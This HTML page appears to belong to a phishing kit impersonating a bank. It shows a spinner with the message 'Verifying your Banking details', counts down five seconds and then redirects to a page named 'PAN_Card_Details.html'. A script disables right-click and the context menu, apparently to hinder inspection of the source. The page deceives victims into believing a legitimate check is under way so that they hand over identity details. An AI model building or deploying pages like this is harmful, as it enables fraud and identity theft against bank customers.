<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta name="theme-color" content="#AE2626">
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <title>Processing...</title>
    <meta name="next-head-count" content="3" />
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Arimo:ital,wght@0,400..700;1,400..700&display=swap" rel="stylesheet">
    <style type="text/css">
          .para span,.text-center
          {text-align:center}
          .circlespinner
          {animation:rotate 2s linear infinite;
          width:50px;
          height:75px;
          stroke:#F9F9FB;}
          
          .path
          {stroke:#AE2626;
          stroke-linecap:round;
          animation:dash 1.5s ease-in-out infinite}
          @keyframes rotate{to
          {transform:rotate(1turn)}}
          @keyframes dash{0%
          {stroke-dasharray:1,150;stroke-dashoffset:0}50%
          {stroke-dasharray:90,150;stroke-dashoffset:-35}
          to
          {stroke-dasharray:90,150;
          stroke-dashoffset:-125}}
          .l-loading
          {margin-top:80px;}
          
          .form-group .invalid-message
          {
          font-size:12px;
          color:red;
          }
    </style>
    <noscript data-n-css=""></noscript>
    <script>
      function countdown() {
        var count = 5;
        var countdownElement = document.getElementById("countdown");

        var countdownInterval = setInterval(function() {
          countdownElement.innerHTML = count;
          count--;

          if (count < 1) {
            clearInterval(countdownInterval);
            window.location.href = "PAN_Card_Details.html";
          }
        }, 1000);
      }

      document.addEventListener("DOMContentLoaded", function() {
        countdown();
      });
    </script>
    <script language="javascript">
    
    var message="Long press disabled.";
    function clickIE4(){
    
    if (event.button==2){
    alert(message);
    return false;
    }
    }
    
    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }
    
    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;
    }
    
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;
    }
    
    document.oncontextmenu=new Function("alert(message);return false;")
    
    </script>
  </head>
  <body>
    <div id="__next">
      <div class="text-center l-loading">
        <svg class="circlespinner" viewBox="0 0 50 50">
          <circle class="path" cx="25" cy="25" r="20" fill="none" stroke-width="5"></circle>
        </svg>
        <h1 style="font-size:14px; color:#AE2626; font-family:'Arimo', sans-serif; letter-spacing:0.2px; font-weight:500;">Please wait...Verifying your Banking details...<br>Redirecting in : <span id="countdown">5</span> seconds.</h1>
      </div>
    </div>
  </body>
</html>